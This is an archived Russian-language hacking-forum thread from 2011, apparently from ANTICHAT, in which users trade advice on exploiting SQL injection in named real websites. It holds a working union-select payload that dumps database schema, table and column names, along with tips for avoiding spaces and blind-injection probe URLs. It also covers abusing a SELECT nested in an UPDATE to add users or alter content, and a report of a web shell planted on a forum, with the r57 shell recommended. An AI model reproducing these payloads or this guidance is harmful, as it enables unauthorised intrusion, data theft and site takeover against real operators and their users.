ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.07.2011, 00:04
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
http://www.gagauzia.md/search.php
sql в поиске, реально раскрутить?
|
|
|
23.07.2011, 00:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от 547
547 said:
покажи как крутить такую скуль...
Код:
Code:
'and(1=0)union(select(1),2,3,4,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),6)#
Учи синтаксис запросов!
|
|
|
|
23.07.2011, 00:59
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Expl0ited
Expl0ited said:
Код:
Code:
'and(1=0)union(select(1),2,3,4,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),6)#
Каким запросом подобрано кол-во полей допишите, пожалуйста ?
Так не получается :
'order(by(6))#
|
|
|
|
23.07.2011, 01:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от FlaktW
FlaktW said:
Каким запросом подобрано кол-во полей допишите, пожалуйста
Так не получается :
'order(by(6))#
Логику запроса посмотри, там и без order by легко можно обойтись, а даже если и использовать то конструкция которую ты привел не допустима, на вышеупомянутом сайте идет разделение слов по пробелу и осуществляется поиск по словам, а значит нам нужно составить запрос без пробелов, вариантов много, я предпочел бы order/**/by(NUM)
|
|
|
|
23.07.2011, 03:08
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
http://opulent-style.com/view_item.php?id=1+and+substring%28%28SELECT%202%2 9,1,1%29=1
реально ли такую инъекцию не как слепую крутить?
http://opulent-style.com/view_item.php?id=1%20order%20by%202
Unknown column '2' in 'order clause'
|
|
|
|
23.07.2011, 08:20
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от vaddd
vaddd said:
http://opulent-style.com/view_item.php?id=1+and+substring%28%28SELECT%202%2 9,1,1%29=1
реально ли такую инъекцию не как слепую крутить?
http://opulent-style.com/view_item.php?id=1%20order%20by%202
Unknown column '2' in 'order clause'
SELECT Вложеный в UPDATE. Этот вариант во много раз удобнее обычной инъекции. Вывести информацию можно через ошибку, а при надобности даже заменить её на свою(Добавить пользователя, редактировать новость).
|
|
|
|
23.07.2011, 20:33
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
Сообщение от XAMEHA
XAMEHA said:
SELECT Вложеный в UPDATE. Этот вариант во много раз удобнее обычной инъекции. Вывести информацию можно через ошибку, а при надобности даже заменить её на свою(Добавить пользователя, редактировать новость).
не могли бы вы показать пример использования?
Сообщение от None
http://www.opulent-style.com/view_item.php?id=1 order by 1
выполняется UPDATE с ошибкой
Сообщение от None
http://www.opulent-style.com/view_item.php?id=1 order by 2
выполняется SELECT...
|
|
|
|
23.07.2011, 21:17
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
вот пример синтаксиса как можно использовать UPDATE но естественно тебе надо знать какие есть таблици для формирования правельного запроса...
Сообщение от None
UPDATE `phpclass_category` SET `cat_id` = '5' , `cat_name` = '[твой код]' WHERE cat_id=5 LIMIT 1;
и логично что кавычки не должны фильтроваться и слешироваться. а они там слешируются _http://www.opulent-style.com/view_item.php?id=1%27 |
|
|
|
24.07.2011, 01:06
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
залил шелл на форум. Когда уже иду по линку шела, он какбы грузится, но вместо файлов ничего нету. Вот пример
http://pikucha.ru/i5KrG
|
|
|
|
24.07.2011, 01:53
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 5
Провел на форуме:
9361
Репутация:
0
|
|
Сообщение от Cherep
Cherep said:
залил шелл на форум. Когда уже иду по линку шела, он какбы грузится, но вместо файлов ничего нету. Вот пример
http://pikucha.ru/i5KrG
залей r57 и будешь видеть файлы...или пользуйся консолью для просмотра файлов
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
